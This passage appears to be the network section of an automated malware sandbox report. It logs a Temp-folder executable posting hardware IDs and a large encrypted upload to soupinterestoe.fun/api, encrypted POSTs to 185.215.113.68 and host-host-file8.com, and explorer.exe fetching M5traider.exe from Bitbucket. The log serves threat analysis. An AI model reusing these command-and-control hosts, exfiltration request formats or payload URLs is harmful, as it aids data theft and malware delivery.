Dec 27, 2023 17:58:40.722783089 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:41.102610111 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=nnpafk9mv6tae4rkgr14hog1bl; expires=Sun, 21-Apr-2024 10:45:19 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tOouR7xZTSxoLetLwMOX6iRbfqJfxrPAmdyte%2FE3VW16shCJBKE4vpnyYhX2%2Bi%2FcHNTZAui9KyPob%2Blu1yqXw707XAeDlkspXVM6G7UxYbrdx%2BDFTneYbJj%2Fbmn50gkVeyELQSc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:41.102637053 CET	45	IN	Data Raw: 31 34 65 63 32 32 32 65 36 62 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 14ec222e6b-DFW15Malformed packet data
Dec 27, 2023 17:58:41.102650881 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49858	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:41.368525028 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:41.368741989 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:41.756800890 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8g1001ehm2u4m8abk4ecslaso8; expires=Sun, 21-Apr-2024 10:45:20 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uAk8rIJ2YgQzLdim5NaH%2FUyp5dh1mfa2vXbRPXlBbnaMmXtk7MqqJjelI2YBcvd0FBGQ3ZVLujGllWya712T7A1wO6jcH2%2BGlMpSCw%2Bgt4ljXF9GSv%2FURJhlR%2BmQpFO%2BnnItwWc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:41.756824017 CET	45	IN	Data Raw: 31 38 66 65 35 39 36 62 66 65 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 18fe596bfe-DFW15Malformed packet data
Dec 27, 2023 17:58:41.756836891 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49859	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:41.896588087 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:41.896810055 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:42.289387941 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=n627mbq1df3qj7h457rih40777; expires=Sun, 21-Apr-2024 10:45:21 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:42 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:42 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:42 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=inD19ayuEMtP0Ux%2BRrfHy2HmXIqJcHyjTgt7cKL1pufNkexC3uYRTsGCFwR0HpzbWwxpBHg5b9J6ptI5RM83bX%2Fw7Y10MoG2os%2BAgNJDILcWJYMsKrRH9ojS2EgtG%2FfF11udFkA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31c1c4 Data Raw: Data Ascii:
Dec 27, 2023 17:58:42.289406061 CET	41	IN	Data Raw: 62 33 32 65 37 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: b32e73-DFW15Malformed packet data
Dec 27, 2023 17:58:42.289417028 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49861	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:44.358033895 CET	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 451664 Host: soupinterestoe.fun
Dec 27, 2023 17:58:44.358355045 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:44.479207039 CET	1286	OUT	Data Raw: 75 7c d5 7a 1d 60 c2 39 11 1b 5c aa 88 e5 a5 d5 e9 55 ad d6 17 ef 29 ce f2 bf aa ca 67 8e f6 f5 fe ec eb 10 1a f3 3f 9c ff b9 b8 b8 b8 34 1c e7 7f ad 8f f3 bf 8a f3 3f e7 7f ce ff 9c ff 39 ff 1b e8 fe d7 c5 ce e7 fc af 31 cf 6b b5 ff 15 ce ff b4 Data Ascii: u\|z`9\U)g?4?91k;EyF_=)tV[x^fD9f_^CK5J~g3d5[K33M=Q'p%sn[5&sI-\|I/e
Dec 27, 2023 17:58:44.479461908 CET	2572	OUT	Data Raw: fd b6 1a 12 66 e2 96 83 f5 3e 06 db e6 b1 5b 37 af a9 5b 36 ab aa 09 5b 78 9f 79 94 77 6c cb a1 61 b0 7d db e6 de 39 9b f5 a9 5b 36 ad e9 ed c9 5b 0d d3 c7 b0 7d d3 c6 15 7d 4c 5f 37 6a 09 75 db 66 43 d4 cd 1b f7 e9 dc ba e9 60 bd cd dc b2 c9 20 Data Ascii: f>[7[6[xywla}9[6[}}L_7jufC` t6#gp7HnQ>8m6&n>\:7m4How&C77lPy*<_}qkg/u2:k+zK'?
Dec 27, 2023 17:58:44.479562044 CET	20576	OUT	Data Raw: 06 c7 66 7c 24 d9 9f cd ff 92 66 80 f0 7c d8 df ad 9b d7 74 e8 80 7a f6 6f 60 7c 9c ed 9b 18 b1 9e 1f 7b 7f 69 7b 7c 4f ff 63 ad 20 67 82 d0 ff 18 69 7b 74 3d db fc 5f e9 7d d2 0b e9 87 9c 01 2c df 73 8e af 9c e1 8b c0 f0 10 9b 0d 62 ff f5 1b 54 Data Ascii: f\|$f\|tzo`\|{i{\|Oc gi{t=_},sbTb~~qf/m[#t]?9s@Ls'k=Fod3}^i\|y_Qe--@gz
Dec 27, 2023 17:58:44.600598097 CET	2572	OUT	Data Raw: aa ff 59 be ab 32 ac cf ec 9b b6 fb 9f fd bb 72 fe d7 5b fe 57 be 01 b6 d7 f7 06 9a ff 95 67 80 ce ff 9c ff 39 ff 1b c8 fe 27 0d b0 51 ff 6b d6 00 9d ff 39 ff eb b4 ff 65 59 60 a1 fa bf bc 06 38 40 fc 2f 66 80 6d f6 bf 44 03 ec d6 f5 ff 7e ec 1b Data Ascii: Y2r[Wg9'Qk9eY`8@/fmD~]\M:.a=`~iq6$dg=OWf$mdO0BC>[]8kJ Oe_6G'LtQ
Dec 27, 2023 17:58:44.600637913 CET	2572	OUT	Data Raw: 7b d1 f9 c0 7c cf 3a 41 7f 4d c0 c1 11 cf c3 36 d6 f1 c3 3e b3 f6 8f c7 e9 7c 38 9e e6 7f f2 5a 73 a6 70 58 43 28 8c cf 5c eb 4f ee 97 bd c1 d2 04 5b e1 7f 17 be a2 b4 01 da 6a 00 f1 fe 32 ef f8 d8 3b 5f 57 3f 0b fc 2f 9c fd 1b f8 df af a5 ff fd Data Ascii: {\|:AM6>\|8ZspXC(\O[j2;_W?/?_gujgXMx^o~t.E1G]ZX F43Cs>/SU?72F4{<*t;=cU?/?Qi
Dec 27, 2023 17:58:44.601188898 CET	7716	OUT	Data Raw: 22 f3 3b c4 6c 5f 86 ce c7 f5 02 b1 7d d3 c6 95 70 fd 3f b9 76 20 7b 79 6d 73 7e e1 7f 72 f6 87 ac 0b 94 f3 7f 59 c3 27 d7 fc c3 fb c9 5b 2e 19 f1 39 d6 f9 c9 f9 1e 49 f5 81 72 bd 3f 1e 37 0d 11 75 7f e6 79 e1 fa 82 41 7d 1f d7 05 94 f5 7f 72 56 Data Ascii: ";l_}p?v {yms~rY'[.9Ir?7uyA}rVH+Vw/gk=kGwqz?7n7gy{o?g`;+mz ]fnkYNvmN?9s/:
Dec 27, 2023 17:58:44.601202965 CET	2572	OUT	Data Raw: 25 ea 85 09 fe a7 67 7f 04 f3 3f a2 6b ff f9 61 3d 1f e7 84 98 06 c8 ba 3f 84 fe c7 da 3e 9c 9f e5 7f 61 9d 9f 17 ac 05 a8 d7 fc 0b e6 00 eb 79 20 a3 87 6a f3 a3 f7 21 91 75 00 8d d9 1e 5c 0f 90 6b ff 71 db 34 42 f6 0c 73 1f bc 8f 6b fe b1 ff 77 Data Ascii: %g?ka=?>ay j!u\kq4Bskwbmr]?5C9~TS7oTX/m?9$\O3M[\|X8=&_#NNs~}]$s~mY/KO-+Gs1.V
Dec 27, 2023 17:58:44.601218939 CET	10288	OUT	Data Raw: 8f 0f 62 7f a8 58 4f 50 90 56 e0 7f 81 ff 4d 60 fe 47 55 e1 80 be ed 9b e9 f3 df 4c 5f 43 9f 97 dc cf af 28 f0 bf 2e f2 3f b0 bf 41 e7 7f 5d 61 80 05 fc 4f 32 c0 c0 ff fa cb ff 34 e7 2b 62 7f 81 ff b5 ce ff da 65 80 fd e2 7f cd 0c 30 0a fc af 03 Data Ascii: bXOPVM`GUL_C(.?A]aO24+be0oUZV`V_Ugq:~6<RMOM?>r=le'YdD}oP?}!22+}5AW4
Dec 27, 2023 17:58:44.601269960 CET	23148	OUT	Data Raw: 77 fc 4c f1 ac 75 37 4e cb bc 06 b8 df 9f 98 ef e6 ed bf 57 8b ff c4 7c 96 bf f8 d3 5a 7c fd 4c f5 9d ae 37 3f b7 e9 d3 9a fe 5c e3 9f c7 ef 5f 6d 99 1b fe 1c b9 ef 32 65 7b 8f 99 ef 78 9b 59 3b f5 9b b3 e3 9b 0c b3 da a8 f6 2f 3b 67 76 25 fe 07 Data Ascii: wLu7NW\|Z\|L7?\_m2e{xY;/;gv%iAr]cg'^3[4~O>~osNP{0^5+A<MT26};e{u-iw*paH:@
Dec 27, 2023 17:58:48.676074982 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=0td84krgbl1almg769er7m8li4; expires=Sun, 21-Apr-2024 10:45:25 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EHb9MX3RkdKb682DZ3bw2GQuxbTyTN1PhlaXoyon%2FaHAIVMoRgn0lohnAu6cjx%2BNLhT4JxdSy%2BGJedRZypnHdsElcLtfJNYXzpThhuMRdQUwMwsiQm743Ybuk3IrYhqpbB8%2BPG4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31c2ba Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49880	185.215.113.68	80

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:59:08.312685966 CET	288	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jcfdgxnlytnmkeqc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 170 Host: 185.215.113.68
Dec 27, 2023 17:59:08.312709093 CET	170	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 2b af a2 d5 f3 c9 39 df 28 fc 83 48 fd 52 Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP+9(HR I?Gn~_ [d)vcuY;\sK;_^}15}l@~38'Pc
Dec 27, 2023 17:59:08.609021902 CET	203	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 2d 20 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 7- ]0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49886	185.215.113.68	80

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:59:22.989104986 CET	288	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kgjamfgjrwjaoacc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: 185.215.113.68
Dec 27, 2023 17:59:22.989141941 CET	271	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 2b af a2 d5 f3 c9 39 df 28 fc d8 70 99 31 Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP+9(p1Ep#sK^}?%E4F~e9!ru:{*r]}:.Ik8+}&ni@ssl_I)_0xX@eSq,I$`sI(<lp=9W"onw7p%w8tENo
Dec 27, 2023 17:59:23.287800074 CET	203	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 2d 20 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 7- ]0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49887	158.160.130.138	80

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:59:25.629957914 CET	272	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ojqpjeir.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: host-host-file8.com
Dec 27, 2023 17:59:25.629985094 CET	166	OUT	Data Raw: 10 87 f5 e0 1b f2 a5 b2 c8 4a 76 32 76 cb ec 8a 43 17 da 43 d0 37 1a 9f cb 9b ae f2 fd d3 9a f6 6c b4 5a d1 10 69 cc 95 ed da f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 38 b3 cc 07 Data Ascii: Jv2vCC7lZiz\wu$f]d81\|Fvf*8M"n0'ifZ#RLr.^kNG[U+I@0:SN

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.192.141.1	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:19 UTC	209	OUT	GET /testing77777/appdevlompent55555555/downloads/M5traider.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bitbucket.org
2023-12-27 16:57:19 UTC	4266	IN	HTTP/1.1 302 Found server: envoy x-usage-quota-remaining: 998810.183 vary: Accept-Language, Origin x-usage-request-cost: 1208.53 cache-control: max-age=0, no-cache, no-store, must-revalidate, private Content-Type: text/html; charset=utf-8 x-b3-traceid: 4f6ff571898d7a4d x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Wed, 27 Dec 2023 16:57:19 GMT x-usage-user-time: 0.036256 x-usage-system-time: 0.000000 location: https://bbuseruploads.s3.amazonaws.com/1bee3bfb-d231-4c42-80c1-836b79e3e5b0/downloads/b6496915-3881-4826-90f1-0b8d8e139169/M5traider.exe?response-content-disposition=attachment%3B%20filename%3D%22M5traider.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPACMPVWP&Signature=VykWqZsmiqhA27rtu14Ozvrz3gU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECEaCXVzLWVhc3QtMSJHMEUCIC9ZJg5LyShpGCfgK9xBd%2BNfXFo5Jl1BokDusFXKUzl1AiEA7f8F1VXwUrCxToTOc9Slu8foenPFBkDfJnlad1jjyqQqsAIIqv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMt7cSR0FVvzrB4MKCqEAs00XLyqwgYvgllfcxxML0V7rNRQULIYUBLpqfwSi9NIlid8dZk0%2BkGa6LzBU0w6EZSdIbxY8T0HGRIy4ZsgthFREXzWAJvv1bbeEJRcDnTvAVTJxKFeB%2FJ8djugQ%2BBJpgk6n%2BRuptcwKHcsxg4%2F19qZXXKG%2FS8DS0INAd%2FZYDox5Xtff6S7qGXsd%2FGip83XMBWLlHwlAHQmWYi25uFpdF02FjEwFpDk3lqQIQ0C0IhUEKiMterg%2BQ2T4z43peg4F1tv%2B2%2Fh3DEVPw5PGYAhfZJqBM2ejvqzpeKHz9BnVWHPxh1jEKjbfGI1A1QDq%2FOUZasoV7JfQ1aluRvMaNJTn4QEcM88MIOpsawGOp0B6A%2BOtuswH3ZDYA1WLInRm1gRHfBtEnqS%2BFl62PAReCq9Ma%2Fr0ln5Qz3Kj%2Bn51V6V6693cTWiS1oTuWfeFfQKHnaD0HR7grGubgANmsvIN%2FpCehFQUeWye4C2Fch1mk9u9QQNz%2BcCQ%2BEQzhLnnYUcZ6txuTVH29pM9tUcxooY9Nfr2MEEK9zd%2BfdQJsuyu7UM68N4AaSa6d75Keav8g%3D%3D&Expires=1703697292 expires: Wed, 27 Dec 2023 16:57:19 GMT x-served-by: e793c2486e7c x-envoy-upstream-service-time: 77 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-b3-spanid: 4f6ff571898d7a4d x-static-version: a44564505899 x-render-time: 0.06370782852172852 Connection: close x-usage-input-ops: 0 x-version: a44564505899 x-request-count: 135 x-frame-options: SAMEORIGIN X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	52.217.163.105	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:20 UTC	1289	OUT	GET /1bee3bfb-d231-4c42-80c1-836b79e3e5b0/downloads/b6496915-3881-4826-90f1-0b8d8e139169/M5traider.exe?response-content-disposition=attachment%3B%20filename%3D%22M5traider.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPACMPVWP&Signature=VykWqZsmiqhA27rtu14Ozvrz3gU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECEaCXVzLWVhc3QtMSJHMEUCIC9ZJg5LyShpGCfgK9xBd%2BNfXFo5Jl1BokDusFXKUzl1AiEA7f8F1VXwUrCxToTOc9Slu8foenPFBkDfJnlad1jjyqQqsAIIqv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMt7cSR0FVvzrB4MKCqEAs00XLyqwgYvgllfcxxML0V7rNRQULIYUBLpqfwSi9NIlid8dZk0%2BkGa6LzBU0w6EZSdIbxY8T0HGRIy4ZsgthFREXzWAJvv1bbeEJRcDnTvAVTJxKFeB%2FJ8djugQ%2BBJpgk6n%2BRuptcwKHcsxg4%2F19qZXXKG%2FS8DS0INAd%2FZYDox5Xtff6S7qGXsd%2FGip83XMBWLlHwlAHQmWYi25uFpdF02FjEwFpDk3lqQIQ0C0IhUEKiMterg%2BQ2T4z43peg4F1tv%2B2%2Fh3DEVPw5PGYAhfZJqBM2ejvqzpeKHz9BnVWHPxh1j